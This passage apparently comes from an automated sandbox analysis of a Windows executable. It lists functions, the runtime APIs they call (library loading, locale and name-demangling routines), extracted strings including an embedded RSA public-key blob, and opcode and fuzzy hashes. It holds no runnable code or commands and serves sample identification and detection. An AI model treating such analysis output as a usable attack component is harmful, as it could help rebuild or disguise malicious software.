                                • Opcode Fuzzy Hash: d60ca2fbe722911927df823af8a7bba25a82945c62a8b0c5a8b6ab598cff0573
                                • Instruction Fuzzy Hash: CAB1A862B32A9589FB11DBB4D8853FC2BF1BB79788F844026CF0A17A5CDB798145C351
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 01217F9C
                                  • Part of subcall function 012151C8: DName::operator+=.LIBVCRUNTIME ref: 012151E3
                                  • Part of subcall function 01218120: DName::operator+.LIBVCRUNTIME ref: 012181FD
                                • DName::operator+.LIBVCRUNTIME ref: 012180C9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+$Name::operator+=
                                • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                • API String ID: 179159573-1464470183
                                • Opcode ID: 64098e6e8979c171900e6b07769428618b10de096e79c18d0e851c17bf63645e
                                • Instruction ID: 92f0736933a5f098f37756a41426f7cdec1d60e027ced0f0a07bf47c387a6052
                                • Opcode Fuzzy Hash: 64098e6e8979c171900e6b07769428618b10de096e79c18d0e851c17bf63645e
                                • Instruction Fuzzy Hash: E9516972B20B65CAEB14CBA8E8807ED3BB2B728388F944119DF0967B1CDBB5C555C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 0121681E
                                • DName::operator+.LIBVCRUNTIME ref: 0121682E
                                • DName::operator+.LIBVCRUNTIME ref: 0121687A
                                • DName::operator+.LIBVCRUNTIME ref: 0121688A
                                • DName::operator+.LIBVCRUNTIME ref: 0121689A
                                • DName::operator+.LIBVCRUNTIME ref: 0121690D
                                • DName::operator+.LIBVCRUNTIME ref: 0121691E
                                • DName::operator+.LIBVCRUNTIME ref: 01216930
                                • DName::operator+.LIBVCRUNTIME ref: 0121695C
                                • DName::operator+.LIBVCRUNTIME ref: 0121696B
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID:
                                • API String ID: 2943138195-0
                                • Opcode ID: f3682abeb51737b1c96dde1708f4df06387f22183a6bf91e51c6252c739eaedf
                                • Instruction ID: bd1cfcb621e1368bf5ca5a7bb3ce8656c166a3cb5eada90977eca559e31616d7
                                • Opcode Fuzzy Hash: f3682abeb51737b1c96dde1708f4df06387f22183a6bf91e51c6252c739eaedf
                                • Instruction Fuzzy Hash: EF515772B20BA299EB01DFA5D8802EC37F2F765788B854416CF496BA1CEFB0C559C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                • API String ID: 0-3207858774
                                • Opcode ID: 95d191f1a70f7d3fa45bd3c1c5036a34ec2a3d598d161516530c8a3cb817b6b0
                                • Instruction ID: 0ff2f07dede9dd46c28504558eba5e1f9ffedd34dcd101bf48c4068589f9071c
                                • Opcode Fuzzy Hash: 95d191f1a70f7d3fa45bd3c1c5036a34ec2a3d598d161516530c8a3cb817b6b0
                                • Instruction Fuzzy Hash: 4181AC72720A898AEB15DF29E4903EC7BF1E7A9B88FD84112CB4907768DF78C155C380
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 01182F1E
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01182F66
                                • _Getctype.LIBCPMT ref: 01182FA4
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 01183063
                                • _Getwctype.LIBCPMT ref: 011830B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                • String ID: 0#@$bad locale name$p$@
                                • API String ID: 1386471777-2741200729
                                • Opcode ID: 8aa00908874b5d7f252c7f8362dce4fab3d5aeeb58485551e0bc29175eff3b80
                                • Instruction ID: ac70f5622eebca4302e51384daa4580aa12d5d588a728d63b04df8b67d62dfc3
                                • Opcode Fuzzy Hash: 8aa00908874b5d7f252c7f8362dce4fab3d5aeeb58485551e0bc29175eff3b80
                                • Instruction Fuzzy Hash: 62517932B11B408AEB19DFB4D5903AC3776FBA8748F084529CF8927A15EF34C1A6D784
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AEBBE
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 011AEC11
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AED45
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                • String ID: 0#@$bad locale name$false$p$@$true
                                • API String ID: 2775327233-3332007710
                                • Opcode ID: 5a54474ce6749e52197634efebb0b23491694a6520c3bd74445580b97b57403f
                                • Instruction ID: 5a8524871d4eab98da4b7c4e14173df80c567115f21e5188a60b07d7e4753490
                                • Opcode Fuzzy Hash: 5a54474ce6749e52197634efebb0b23491694a6520c3bd74445580b97b57403f
                                • Instruction Fuzzy Hash: DB51AF33606B81D6EB29DF64E8803AD7BB4FBA8744F540229DB8913E28DF38C161C744
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 01182BBE
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01182C06
                                • _Getctype.LIBCPMT ref: 01182C44
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 01182CDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                • String ID: .@$0#@$bad locale name$p$@
                                • API String ID: 2967684691-3197107300
                                • Opcode ID: bbd03d1f85f2cf631645acde4e23673945d46a44ee03dc0b6aba25315499ca53
                                • Instruction ID: 3abe89cb9156051987b5889211ec7ec6e438e82cbe7da3bd8f772b3a170513cc
                                • Opcode Fuzzy Hash: bbd03d1f85f2cf631645acde4e23673945d46a44ee03dc0b6aba25315499ca53
                                • Instruction Fuzzy Hash: B9513A32702B409AEB1AEFB4D8907EC37B5EB94748F048529DF4927A59DF34C166D344
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 01219A48
                                  • Part of subcall function 01216A94: DName::operator+.LIBVCRUNTIME ref: 01216F41
                                  • Part of subcall function 01216A94: DName::operator+.LIBVCRUNTIME ref: 01216F79
                                • DName::operator+.LIBVCRUNTIME ref: 012199FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                • API String ID: 2943138195-2239912363
                                • Opcode ID: f323292cbcf023e51e9e3e785b226c31c180bbdabd3819fe6ae4b2f630ffd583
                                • Instruction ID: 8f5db57453ca555d2fdbb13a69540d87a5d4a3c51f60c413bec1d180f045ac19
                                • Opcode Fuzzy Hash: f323292cbcf023e51e9e3e785b226c31c180bbdabd3819fe6ae4b2f630ffd583
                                • Instruction Fuzzy Hash: 74519072A24B9589FF12CF64E8903ED7BF2B728748F484125CF4913B19DB788198C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 0121BA34
                                • DName::operator+.LIBVCRUNTIME ref: 0121BA43
                                • DName::operator+=.LIBVCRUNTIME ref: 0121BB60
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 01219EC9
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 01219F02
                                  • Part of subcall function 01219E38: DName::operator+.LIBVCRUNTIME ref: 0121A22B
                                • DName::operator+.LIBVCRUNTIME ref: 0121BAE3
                                • DName::operator+.LIBVCRUNTIME ref: 0121BAF3
                                • DName::operator+.LIBVCRUNTIME ref: 0121BB9D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+$Name::operator+=
                                • String ID: {for
                                • API String ID: 179159573-864106941
                                • Opcode ID: 8ad047f1e5cf7ad56f798d9d9cc9ee1cd39f8e4d1df3b399bbd68c7c52836fd7
                                • Instruction ID: 52cddac98f29ac17e2cf84a723ad783f5b3db9a479288f00e101c856146ee44b
                                • Opcode Fuzzy Hash: 8ad047f1e5cf7ad56f798d9d9cc9ee1cd39f8e4d1df3b399bbd68c7c52836fd7
                                • Instruction Fuzzy Hash: D9511972624B85AAEB11DF28D5803ED77B1F7A5788F848052DB4C4BB5CEB78C6A5C340
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryExW.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0121C4C3,?,?,00000000,01211A92,?,?,7FFFFFFFFFFFFFFF,012116E9), ref: 0121C343
                                • GetLastError.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0121C4C3,?,?,00000000,01211A92,?,?,7FFFFFFFFFFFFFFF,012116E9), ref: 0121C351
                                • LoadLibraryExW.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0121C4C3,?,?,00000000,01211A92,?,?,7FFFFFFFFFFFFFFF,012116E9), ref: 0121C37B
                                • FreeLibrary.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0121C4C3,?,?,00000000,01211A92,?,?,7FFFFFFFFFFFFFFF,012116E9), ref: 0121C3C1
                                • GetProcAddress.KERNEL32(?,?,7FFFFFFFFFFFFFFF,0121C4C3,?,?,00000000,01211A92,?,?,7FFFFFFFFFFFFFFF,012116E9), ref: 0121C3CD
                                Strings
                                • api-ms-, xrefs: 0121C363
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 0121C2D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Library$Load$AddressErrorFreeLastProc
                                • String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH$api-ms-
                                • API String ID: 2559590344-1894702607
                                • Opcode ID: 0e35df4dea95b5b099f12856dbfb21c2d39485917730be74610efb69ace14267
                                • Instruction ID: 821a97c02a125d52bf24af66080255403b3ba0382006901cb689b051e83555f5
                                • Opcode Fuzzy Hash: 0e35df4dea95b5b099f12856dbfb21c2d39485917730be74610efb69ace14267
                                • Instruction Fuzzy Hash: 72314436326B44C2EF16DB1AE84079937D4F718BA4F4A0625EF194B349EF78C160C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AD87D
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AD8A2
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AD8CD
                                • std::_Facet_Register.LIBCPMT ref: 011AD945
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AD968
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AD992
                                • _Init_thread_footer.LIBCMT ref: 011ADA04
                                • _Mtx_unlock.LIBCPMT ref: 011ADA51
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Init_thread_footerMtx_unlockRegister
                                • String ID:
                                • API String ID: 2319529737-0
                                • Opcode ID: 62392da8d02d594bcb4ef99a4f1f7d82b4d990a267343a84f27819524f90e40c
                                • Instruction ID: c15852e02ec9189df4f0774880b6da4571adf13365f43b3916245f9a434b5513
                                • Opcode Fuzzy Hash: 62392da8d02d594bcb4ef99a4f1f7d82b4d990a267343a84f27819524f90e40c
                                • Instruction Fuzzy Hash: 4851D335204F4182EF19DF69F8903A977A1FB98B94F884126DB9D47B64EF38C5A1C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011ADAAD
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011ADAD2
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011ADAFD
                                • std::_Facet_Register.LIBCPMT ref: 011ADB75
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011ADB98
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011ADBC2
                                • _Init_thread_footer.LIBCMT ref: 011ADC34
                                • _Mtx_unlock.LIBCPMT ref: 011ADC81
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Init_thread_footerMtx_unlockRegister
                                • String ID:
                                • API String ID: 2319529737-0
                                • Opcode ID: 50404775b54e6279459ec58b9dfefb4ba470b0b079a1a1c6ddb2293cede86123
                                • Instruction ID: e09daf1aa20b386901683b114964286aebc36543588c6eec2f36df53f29ce223
                                • Opcode Fuzzy Hash: 50404775b54e6279459ec58b9dfefb4ba470b0b079a1a1c6ddb2293cede86123
                                • Instruction Fuzzy Hash: 96518E36204F4182EF19DF69F8403A977A1FB99B98FC84129DA8D87B69DF38C561C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 012332EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 00fee75a44f040fbe5a608d1d1e73cbc90df0cc96f2c1ddc1aeb8fac1a669185
                                • Instruction ID: 492ac89a8ce82df59d64720244e38c3438e1582989256b35bf4b901a65e75fc7
                                • Opcode Fuzzy Hash: 00fee75a44f040fbe5a608d1d1e73cbc90df0cc96f2c1ddc1aeb8fac1a669185
                                • Instruction Fuzzy Hash: 35B145B2234B96A2DB21DF59D4403AEBB64F7D5B80F890205DF8A07754DFB9CA65C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AE851
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AE85D
                                • Concurrency::cancel_current_task.LIBCPMT ref: 011AEA23
                                  • Part of subcall function 01181AF0: __std_exception_copy.LIBVCRUNTIME ref: 01181B38
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011AEA29
                                Strings
                                • 0@@, xrefs: 011AEA66
                                • MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 011AE875
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$__std_exception_copy
                                • String ID: 0@@$MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
                                • API String ID: 588606609-1774978856
                                • Opcode ID: a32445cadea2e66daa0f8cd72859656e487b75b610a26fa46cd5bc95ca53dca3
                                • Instruction ID: 734e62ffead04405d6cb938cb92800d5ca03781cf27635bbcbbca632ae39e6bb
                                • Opcode Fuzzy Hash: a32445cadea2e66daa0f8cd72859656e487b75b610a26fa46cd5bc95ca53dca3
                                • Instruction Fuzzy Hash: 7D91E426311B8195DE18EF26E5542AE6B61F758FE4F884725DFAE0BB98DF78C081C304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011825BE
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01182606
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011826EB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                • String ID: 0#@$bad locale name$p$@
                                • API String ID: 2775327233-2741200729
                                • Opcode ID: 5a6e52143b2679ec04add99f0129870b8bc018f565b4d574c0b8e613b27beaf9
                                • Instruction ID: 341618b16dca83c63c00343a8dc138a734048ac7569c67fdc99bbcf7ee4c6b72
                                • Opcode Fuzzy Hash: 5a6e52143b2679ec04add99f0129870b8bc018f565b4d574c0b8e613b27beaf9
                                • Instruction Fuzzy Hash: 65719B32701B408AEB16EFB5E8907AD33B5FB98B88F048525DF4927A18DF34C062C744
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AEF8E
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 011AEFD6
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AF093
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                • String ID: 0#@$bad locale name$p$@
                                • API String ID: 2775327233-2741200729
                                • Opcode ID: 65be75cf3f71616b3e03e5be75f73493a5a834a047575dfddd2b06f92ec79eee
                                • Instruction ID: 2f537911c2fd7736e7e9f639dfc42fe131810fcff99747b33bc1595863763f91
                                • Opcode Fuzzy Hash: 65be75cf3f71616b3e03e5be75f73493a5a834a047575dfddd2b06f92ec79eee
                                • Instruction Fuzzy Hash: 8B416837702B41DAEB19DFB4D8903AC3BAAEB64748F484525DF4967A58DF34C126C348
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 011AEDEE
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 011AEE36
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 011AEEE9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                • String ID: 0#@$bad locale name$p$@
                                • API String ID: 2775327233-2741200729
                                • Opcode ID: 86efa0c53008ffa23f12ca4a0a108fef71f47823a52550b2cf4d273bd771f620
                                • Instruction ID: a6cea0b788f2011e0004ba6c93e3f2e1df36dee02103acd4b7097e9333522840
                                • Opcode Fuzzy Hash: 86efa0c53008ffa23f12ca4a0a108fef71f47823a52550b2cf4d273bd771f620
                                • Instruction Fuzzy Hash: A2416A37702A40DAEB19DFB4D8907AC3BB9EB54748F484425EF4967A18DF34C162C348
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 011B3C21
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: _invalid_parameter_noinfo_noreturn
                                • String ID: (<C$4<C$@<C$P<C$PO@
                                • API String ID: 3668304517-3089111763
                                • Opcode ID: 689bd1539f5a96f75448e4938f2d4f51b825a0e1128a0bb8cce1a215b3676b9f
                                • Instruction ID: aaf11dea897acd9164981e1789248365b106c201467228bc7504d9cc68f9fd09
                                • Opcode Fuzzy Hash: 689bd1539f5a96f75448e4938f2d4f51b825a0e1128a0bb8cce1a215b3676b9f
                                • Instruction Fuzzy Hash: AC314832311B8486EB08DF6AE5A439D3366F745B88F589125CF9D0B768DF39C4A6C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 012165E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
                                • Associated: 00000000.00000002.239885070.0000000001180000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240008755.00000000012A1000.00000008.00020000.sdmp Download File
                                • Associated: 00000000.00000002.240016169.00000000012AD000.00000002.00020000.sdmp Download File
                                Yara matches
                                Similarity
                                • API ID: Name::operator+
                                • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                • API String ID: 2943138195-2211150622
                                • Opcode ID: 82c7ac283c2882f1ea6fe7e99822f7f176e1e04954c0fe3d004444a9aa5f88ca
                                • Instruction ID: b6f32e40c01ed2fe65420dbe2d78bff288dd203036849dfcc26d535f30f20eb5
                                • Opcode Fuzzy Hash: 82c7ac283c2882f1ea6fe7e99822f7f176e1e04954c0fe3d004444a9aa5f88ca
                                • Instruction Fuzzy Hash: 5C413DB2A24B959DFB01CF68E8813EC7BF0B768708F984515CB4957728DBBC81A4C791
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBVCRUNTIME ref: 012181FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.239889857.0000000001181000.00000020.00020000.sdmp, Offset: 01180000, based on PE: true
